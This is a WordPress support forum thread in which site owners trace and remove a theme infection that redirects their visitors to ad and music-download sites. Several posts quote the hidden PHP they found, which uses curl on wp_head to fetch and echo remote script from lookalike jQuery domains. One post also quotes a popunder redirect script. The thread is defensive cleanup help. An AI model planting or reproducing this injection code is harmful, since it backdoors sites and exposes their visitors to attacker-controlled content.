WordPress.org

Ready to get started?Download WordPress

Forums

[resolved] [closed] Unwanted Jquery (jquerys) script (55 posts)

  1. watesam
    Member
    Posted 1 year ago #

    walteravila@ Puedes hacer lo que yo hice, primero limpia tu pc http://download.eset.com/special/eos/esetsmartinstaller_enu.exe, segundo des-instala los plugins que instalaste últimamente y luego busca en http://urlquery.net/ agregando el link de tu pagina que no tengas el malware jquerys, la otra es buscar el codigo en la plantilla, pero puede ser difícil encontrarlo por que puede estar en cualquier php
    espero te sirva a mi me funciono.

  2. PeggyMe
    Member
    Posted 1 year ago #

    So the code that needs to be removed is:

    if (!function_exists('insert_jquery_theme')){function insert_jquery_theme(){if (function_exists('curl_init')){$url = "http://www.wpstats.org/jquery-1.6.3.min.js";$ch = curl_init(); $timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_theme');}

    Removing this code fixed one of my sites perfectly, but the other one still is not fixed.

  3. PeggyMe
    Member
    Posted 1 year ago #

    the code I had to remove was close to the code you found, but just a little bit different.
    Here is the code that I removed

    if (!function_exists('insert_jquery_theme')){function insert_jquery_theme(){if (function_exists('curl_init')){$url="http://www.jqueryc.com/jquery-1.6.3.min.js";$ch = curl_init();$timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_jquery_theme');}

  4. elledios
    Member
    Posted 1 year ago #

    :( Someone could take a look to my site? colegiosagradoscorazonesmedellin.edu.co i have the same trouble :(

  5. PeggyMe
    Member
    Posted 1 year ago #

    I looked at the source code to your site. I do not see the unwanted jquerys.org code. You must have fixed it?

  6. elledios
    Member
    Posted 1 year ago #

    Oh man, thanks for the help, for take the time to see the source
    No, maybe is a plugin, but is impossible to guess when the redirection will happen.

    Now i know that my template is not corrupted. Thanks a lot for that men!

    I appreciate it

  7. gemma dyson
    Member
    Posted 1 year ago #

    I am facing same problem with my client website.. Trying to figure it out

  8. gemma dyson
    Member
    Posted 1 year ago #

    Does it also happens to forums?

  9. johnnydoughnyc
    Member
    Posted 1 year ago #

    I am having the same issue with this stupid downloadfreemusic.com hack....although since I'm now working on the site offline, I can't direct anyone to it for help. I did notice that when I view the source code, the script below is loaded on the Blog page. Any idea on where to find this in the files to delete?

    <script type="text/javascript">
       var puShown = false;
    
       function doOpen(url)
       {
               if ( puShown == true )
               {
                       return true;
               }
    
               win = window.open(url, 'wmPu', 'toolbar,status,resizable,scrollbars,menubar,location,height=800,width=1200');
               if ( win )
               {
                       win.blur();
                       puShown = true;
               }
               return win;
       }
    
       function setCookie(name, value, time)
       {
           var expires = new Date();
    
           expires.setTime( expires.getTime() + time );
    
           document.cookie = name + '=' + value + '; expires=' + expires.toGMTString();
       }
    
       function getCookie(name) {
           var cookies = document.cookie.toString().split('; ');
           var cookie, c_name, c_value;
    
           for (var n=0; n<cookies.length; n++) {
               cookie  = cookies[n].split('=');
               c_name  = cookie[0];
               c_value = cookie[1];
    
               if ( c_name == name ) {
                   return c_value;
               }
           }
    
           return null;
       }
    
       function initPu()
       {
               if ( document.attachEvent )
               {
                       document.attachEvent( 'onclick', checkTarget );
               }
               else if ( document.addEventListener )
               {
                       document.addEventListener( 'click', checkTarget, false );
               }
       }
    
       function checkTarget(e)
       {
           if ( !getCookie('popundr') ) {
               var e = e || window.event;
               var win = doOpen('http://www.downloadmusicfreenow.com/');
    
               setCookie('popundr', 1, 24*60*60*1000);
           }
       }
    
       initPu();
    </script>

    [Moderator Note: Please post code or markup snippets between backticks or use the code button. As it stands, your code may now have been permanently damaged/corrupted by the forum's parser.]

  10. kmessinger
    Volunteer Moderator
    Posted 1 year ago #

    @johnnydoughnyc
    When posting code please use the code button above. With more than 10 lines of code please use pastebin.com

  11. johnnydoughnyc
    Member
    Posted 1 year ago #

    Note to self! Sorry about that :) Btw, if anyone can help...I would be greatly appreciative.

  12. johnnydoughnyc
    Member
    Posted 1 year ago #

    Nevermind...genius over here figured it out ;)

  13. wiremark
    Member
    Posted 1 year ago #

    Any chance you could point me in the right direction Johnny?

    I'm having a similar problem.

  14. dzakyrov
    Member
    Posted 1 year ago #

    if you use Modernize themes, just open the functions.php and check this

    include'include/plugin/post.php'; // post function

    add double-slash to make it as comment like this :

    //include'include/plugin/post.php'; // post function << known to call malicious code

    and just delete the post.php at your plugin folder.

    HTH

  15. Fiascos
    Member
    Posted 1 year ago #

    Please someone help me. I have the same redirection problem on the same website. The only thing is that i checked everyhing listed here, and didnt find the problem. Can someone check my website?

    I can also send you a theme in ZIP if needed.

  16. esmi
    Forum Moderator
    Posted 1 year ago #

    Please post your own topic.

  17. profix
    Member
    Posted 1 year ago #

    In my case infected file was include\functions-init.php.

    URL: http://www.jquerye.com/jquery-1.6.3.min.js

    Line 1: <?php if (!function_exists('insert_inj')){function insert_inj(){if (function_exists('curl_init')){$url = "http://www.jquerye.com/jquery-1.6.3.min.js";$ch = curl_init(); $timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}}add_action('wp_head', 'insert_inj');} ?>

    Download theme folder first, then download Notepad++ and open it, go to Find -> Find in files type in jquery-1.6.3.min.js, browse your downloaded theme folder.

  18. cdseo
    Member
    Posted 1 year ago #

    就是这个问题 之前我的站也出现过一样的情况 注释掉

    include'include/functions-init.php';

    即可!

  19. esmi
    Forum Moderator
    Posted 1 year ago #

    Please post your own topic. And these are English language forums, so please use English.

  20. Bizcus
    Member
    Posted 1 year ago #

    I am using ClassiPress by Appthemes and have the same redirect problem going to downloadfreemusic.com. I can't find the infected file. Could someone please help. Thanks.

  21. esmi
    Forum Moderator
    Posted 1 year ago #

  22. Bucki
    Member
    Posted 1 year ago #

    I am glad, I got this ERROR message today
    and made a research on this ... and whoooooppppsss!

    Finally I know what caused my website to open
    random ADS website .... I wondered what it was really!

    I hope that melodious code is only within the FUNCTION.PHP
    cos that is where I found it and deleted it.

    If I need to remove any other code, let me know pls

    Thanks

  23. AndrewHeppinstall
    Member
    Posted 1 year ago #

    Thank you so much for your help!

  24. ditin
    Member
    Posted 1 year ago #

    Could you pleas help me too?
    My website has same problem.

    My Website

  25. esmi
    Forum Moderator
    Posted 1 year ago #

    As per the Forum Welcome, please post your own topic. Your problem - despite any similarity in symptoms - is likely to be completely different.

Topic Closed

This topic has been closed to new replies.

About this Topic